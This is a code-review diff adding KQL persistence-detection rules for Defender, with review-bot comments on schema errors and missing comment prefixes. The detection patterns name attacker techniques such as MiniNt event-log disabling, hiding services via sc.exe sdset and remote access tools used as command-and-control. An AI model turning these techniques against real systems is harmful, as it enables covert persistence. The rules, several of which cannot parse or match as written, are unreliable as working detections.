+++ b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql
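Review bot: The two description continuation lines (`+This behaviour could be potentially suspicious …` and `+Attackers specifically choose this technique …`) are emitted without a `//` prefix, so the file is not valid KQL and will fail at load time rather than at match time. Prefix both with `// `, or fold the text onto the `// Description:` line. The query itself is fine; `contains "call"` is loose, but the required `stdregprov` term keeps it narrow enough for a `medium`.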
@@ -0,0 +1,12 @@
+// Title: Registry Modification to Hidden File Extension
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative scripts
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql
new file mode 100644
index 00000000..b53b13d4
--- /dev/null
+++ b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql
@@ -0,0 +1,12 @@
+// Title: Registry Modification Via Regini.EXE
+// Author: Eli Salem, Sander Wiebing, oscd.community
+// Date: 2020-10-08
+// Level: low
+// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate modification of keys
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
new file mode 100644
index 00000000..12c4e84e
--- /dev/null
+++ b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
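Review bot: `RegistryKey endswith "…\\Explorer\\Advanced\\Hidden"` / `…\\HideFileExt` together with `RegistryValueData =~ "DWORD (0x0000000N)"` are Sysmon `TargetObject`/`Details` shapes; in `DeviceRegistryEvents` the key ends at `\\Advanced`, the value name is in `RegistryValueName`, and DWORD data is a decimal string, so this rule cannot match. The equivalent is `RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced" and ((RegistryValueName =~ "Hidden" and RegistryValueData == "2") or (RegistryValueName =~ "HideFileExt" and RegistryValueData == "1"))`. The regini rule that shares this line looks correct, including the doubled backslash inside the regex literal.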
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - AnyDesk Incoming Connection
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-09-02
+// Level: medium
+// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally).
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql
new file mode 100644
index 00000000..487322ea
--- /dev/null
+++ b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Installation Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-11
+// Level: medium
+// Description: Detects ScreenConnect program starts that establish a remote access to a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate use by administrative staff
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
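Review bot: The `| where` clause only tests the initiating image, so this rule fires on every network event from `AnyDesk.exe`, outbound included, even though the title, description and the False Positives note all assume inbound sessions; the Sigma source's direction constraint (presumably `Initiated: false`) was dropped in conversion. Restrict it to `| where ActionType == "InboundConnectionAccepted" and (InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe")`. Without that, a `medium` alert on every AnyDesk heartbeat will be tuned out within a day on any fleet that has the tool installed. The ScreenConnect rule sharing this line looks fine as-is.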
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
new file mode 100644
index 00000000..55485657
--- /dev/null
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Team Viewer Session Started On Linux Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
new file mode 100644
index 00000000..65bc92f3
--- /dev/null
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
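Review bot: The description continuation `+Once a connection has been started, an investigator can verify …` is written without a `//` prefix, which makes the file unparseable as KQL; it should read `// Once a connection has been started, …`. The predicate itself fits a Linux path layout (`/TeamViewer_Desktop`, `/TeamViewer_Service`). One caveat worth recording in the header: `ProcessCommandLine endswith "… --IPCport 5939 --Module 1"` pins an exact argument string, so a TeamViewer update that changes the port or module id silently blinds the rule; a line like `// NOTE: argument string observed on TeamViewer <version>; re-verify after client upgrades` would flag that, if the version is known.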
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
new file mode 100644
index 00000000..b101c7c0
--- /dev/null
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
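Review bot: Same missing `//` on the `+Once a connection has been started …` continuation line as in the Linux rule, so this file will not parse until it is commented. Beyond that, the `| where` clause is byte-identical to the Linux rule's (`/TeamViewer_Desktop --IPCport 5939 --Module 1`, `/TeamViewer_Service`) and `DeviceProcessEvents` carries no OS column, so each of the two rules matches both platforms and the titles overpromise. Either merge them into a single non-Windows rule, or join `DeviceInfo` on `DeviceId` and filter on `OSPlatform` if per-platform alerting is actually wanted.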
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - Team Viewer Session Started On Windows Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
new file mode 100644
index 00000000..80578c80
--- /dev/null
+++ b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
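Review bot: `FolderPath =~ "TeamViewer_Desktop.exe"` and `InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"` are exact comparisons against a bare file name, but both columns hold the full image path, so this rule can never match on Windows. Use `FolderPath endswith "\\TeamViewer_Desktop.exe" and InitiatingProcessFolderPath endswith "\\TeamViewer_Service.exe"`, or compare `FileName` / `InitiatingProcessFileName` with `=~`. The `+Once a connection has been started …` line also needs its `//` prefix, as in the Linux and macOS variants.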
@@ -0,0 +1,14 @@
+// Title: Removal of Potential COM Hijacking Registry Keys
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
+These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\shell\\open\\command" and (not((InitiatingProcessFolderPath endswith "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenWith.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", "C:\\Program Files\\Avira\\Antivirus\\")) and (RegistryKey endswith "\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command" or RegistryKey endswith "\\AntiVir.Keyfile\\shell\\open\\command")) or (InitiatingProcessFolderPath endswith "\\reg.exe" and RegistryKey endswith "\\Discord\\shell\\open\\command") or (InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "C:\\eclipse\\eclipse.exe" and RegistryKey contains "_Classes\\eclipse+") or InitiatingProcessFolderPath contains "\\Microsoft\\EdgeUpdate\\Install" or (InitiatingProcessFolderPath endswith "\\Everything.exe" 
and RegistryKey contains "\\Everything.") or ((InitiatingProcessFolderPath contains "AppData\\Local\\Temp" and InitiatingProcessFolderPath contains "\\setup.exe") or (InitiatingProcessFolderPath contains "\\Temp\\is-" and InitiatingProcessFolderPath contains "\\target.tmp")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or InitiatingProcessFolderPath endswith "\\ninite.exe" or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or (InitiatingProcessFolderPath endswith "\\Spotify.exe" and RegistryKey endswith "\\Spotify\\shell\\open\\command") or (InitiatingProcessFolderPath contains "\\Temp" and InitiatingProcessFolderPath contains "\\TeamViewer") or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey endswith "\\wireshark-capture-file*"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
new file mode 100644
index 00000000..1c40d43f
--- /dev/null
+++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
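Review bot: The description says this rule detects deletion of `\\shell\\open\\command` entries, but the `| where` clause has no `ActionType` constraint, so every set, create and rename of those keys fires too and the `medium` rule becomes an installer-noise generator despite the long exclusion list. Prepend `ActionType in ("RegistryKeyDeleted", "RegistryValueDeleted") and ` to the predicate. Two exclusions are also dead as written: `InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", …)` compares a full image path with a directory and should be `startswith`, and `RegistryKey endswith "\\wireshark-capture-file*"` keeps the Sigma `*` as a literal. The hunk begins on the previous line; its `| where` clause is one diff line wrapped across both.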
@@ -0,0 +1,13 @@
+// Title: RestrictedAdminMode Registry Value Tampering
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
new file mode 100644
index 00000000..382a86be
--- /dev/null
+++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
@@ -0,0 +1,13 @@
+// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "DisableRestrictedAdmin"
\ No newline at end of file
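Review bot: `RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"` treats the value name as part of the key path, which is how Sysmon reports `TargetObject` but not how `DeviceRegistryEvents` works (`RegistryValueName` is a separate column), so this `high`-level rule cannot match. Use `RegistryKey endswith "\\Control\\Lsa" and RegistryValueName =~ "DisableRestrictedAdmin"`; dropping `CurrentControlSet` also covers writes addressed via `ControlSet001`. The two description continuation lines (`+RestrictedAdmin mode prevents …`, `+This prevents your credentials …`) need a `//` prefix or the file will not parse, and the second is truncated (`compromise` should be `compromised.`).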
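Review bot: The two description continuation lines (`+RestrictedAdmin mode prevents the transmission …` and `+This prevents your credentials from being harvested …`) lack the `//` prefix and will make this file fail to parse; both should start with `// `. The predicate is otherwise reasonable, though `ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa"` misses `ControlSet001`-style paths and PowerShell `HKLM:\\SYSTEM\\…` spellings are only caught because `HKLM:\\System\\…` happens to contain the same substring; if wider coverage is wanted, `contains "\\Control\\Lsa"` is the cheap widening and the `DisableRestrictedAdmin` term keeps it precise.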
diff --git a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql
new file mode 100644
index 00000000..22fa6a98
--- /dev/null
+++ b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Run Once Task Configuration in Registry
+// Author: Avneet Singh @v3t0_, oscd.community
+// Date: 2020-11-15
+// Level: medium
+// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate modification of the registry key by legitimate program
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql
new file mode 100644
index 00000000..d4510f26
--- /dev/null
+++ b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql
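Review bot: `RegistryKey endswith "\\StubPath"` cannot match in `DeviceRegistryEvents`, where the value name is reported in `RegistryValueName` rather than appended to the key, so the whole rule is inert; the Chrome/Edge exclusions on `RegistryValueData` are fine and can stay. Change the selection to `RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryValueName =~ "StubPath"`. The title and description call this a "Run Once" key while the query targets Active Setup's `StubPath`, which is what `runonce.exe /AlternateShellStartup` executes; a one-liner such as `// Note: the key is Active Setup StubPath, executed by runonce.exe, not the Run/RunOnce keys` would save the next reader a lookup.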
@@ -0,0 +1,10 @@
+// Title: Run Once Task Execution as Configured in Registry
+// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
+// Date: 2020-10-18
+// Level: low
+// Description: This rule detects the execution of Run Once task as configured in the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
new file mode 100644
index 00000000..33fe2edb
--- /dev/null
+++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
@@ -0,0 +1,15 @@
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key.
+This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
+Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+// - Highly Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-Item " or ProcessCommandLine contains "ni ") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
new file mode 100644
index 00000000..3d5077f1
--- /dev/null
+++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
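Review bot: The `+This key is used to disable …` and `+Adversaries may want to disable …` description lines have no `//` prefix, so the file is syntactically invalid KQL until they are commented out; at level `high` a rule that never loads is the worst outcome. The predicate is sound. One thing worth a header note: `ProcessCommandLine contains "ni "` also matches unrelated tokens ending in `ni` followed by a space, but the required `\\SYSTEM\\CurrentControlSet\\Control\\MiniNt` substring keeps that from being a practical false-positive source.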
@@ -0,0 +1,15 @@
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.
+Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
+Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+// - Highly Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql
new file mode 100644
index 00000000..6274aaec
--- /dev/null
+++ b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql
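Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)"` cannot match a real event: `CurrentControlSet001` is not a key name (it reads like a merge of `CurrentControlSet` and `ControlSet001`), and the `\\(Default)` suffix is the Sysmon rendering of the default value, which `DeviceRegistryEvents` does not append to `RegistryKey`. Since the behaviour of interest is the key appearing at all, `| where ActionType == "RegistryKeyCreated" and RegistryKey endswith "\\Control\\MiniNt"` expresses it and covers any control set. The two description continuation lines also need their `//` prefix before the file will parse.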
@@ -0,0 +1,10 @@
+// Title: Service Binary in Suspicious Folder
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detect the creation of a service with a service binary located in a suspicious directory
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*")) and (not(((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\") or (RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql
new file mode 100644
index 00000000..4d64c17b
--- /dev/null
+++ b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql
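Review bot: Both branches of the `| where` clause AND in `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*"`, an exact comparison with a literal `*` against a key name that does not exist, so this `high`-level rule can never fire; the `endswith "\\ImagePath"` / `"\\Start"` tests and the `DWORD (0x0000000N)` data values are likewise Sysmon shapes rather than MDE ones (value name in `RegistryValueName`, DWORD data as a decimal string). The selection needs rebuilding on the MDE columns as sketched below, and the `MBAMInstallerService` exclusion at the end has the same `\\ImagePath` problem. A `// NOTE: RegistryKey holds the key only; the value name is in RegistryValueName (MDE schema)` comment would help the next converter run not regress it.

```kql
DeviceRegistryEvents
| where RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services\\"
| where (RegistryValueName =~ "ImagePath"
         and (RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\"))
     or (RegistryValueName =~ "Start" and RegistryValueData in ("0", "1", "2")
         and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\"))
// … unchanged: the "\Common Files\" + "\Temp\" exclusion …
| where not(RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\Services\\MBAMInstallerService" and RegistryValueName =~ "ImagePath")
```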
@@ -0,0 +1,10 @@
+// Title: Service DACL Abuse To Hide Services Via Sc.EXE
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..c6a06180
--- /dev/null
+++ b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service Security Descriptor Tampering Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/Persistence/servicedll_hijack.kql
new file mode 100644
index 00000000..7c54ba65
--- /dev/null
+++ b/KQL/rules/Persistence/servicedll_hijack.kql
@@ -0,0 +1,15 @@
+// Title: ServiceDll Hijack
+// Author: frack113
+// Date: 2022-02-04
+// Level: medium
+// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
+This is often used as a method of persistence.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Administrative scripts
+// - Installation of a service
+
+DeviceRegistryEvents
+| where ((RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql
new file mode 100644
index 00000000..b774d693
--- /dev/null
+++ b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql
